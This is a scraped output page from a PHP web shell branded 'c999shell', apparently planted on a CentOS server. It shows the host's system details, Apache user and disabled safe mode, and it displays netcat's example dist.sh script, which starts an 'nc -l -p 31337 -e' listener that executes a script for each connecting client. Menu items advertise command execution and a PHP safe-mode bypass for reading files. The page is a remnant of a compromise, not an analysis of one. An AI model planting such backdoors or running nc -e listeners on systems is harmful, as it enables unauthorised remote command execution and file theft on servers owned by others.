Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/nc-1.84/scripts/ drwxr-xr-x |
Viewing file: dist.sh (897 B) -rwxr-xr-x Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | #! /bin/sh ## This is a quick example listen-exec server, which was used for a while to ## distribute netcat prereleases. It illustrates use of netcat both as a ## "fake inetd" and a syslogger, and how easy it then is to crock up a fairly ## functional server that restarts its own listener and does full connection ## logging. In a half-screen of shell script!! PORT=31337 sleep 1 SRC=`tail -1 dist.log` echo "<36>elite: ${SRC}" | /usr/bin/nc -u -w 1 localhost 514 > /dev/null 2>&1 echo ";;; Hi, ${SRC}..." echo ";;; This is a PRERELEASE version of 'netcat', tar/gzip/uuencoded." echo ";;; Unless you are capturing this somehow, it won't do you much good." echo ";;; Ready?? Here it comes! Have phun ..." sleep 8 cat dist.file sleep 1 ./nc -v -l -p ${PORT} -e dist.sh < /dev/null >> dist.log 2>&1 & sleep 1 echo "<36>elite: done" | /usr/bin/nc -u -w 1 localhost 514 > /dev/null 2>&1 exit 0 |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0146 ]-- |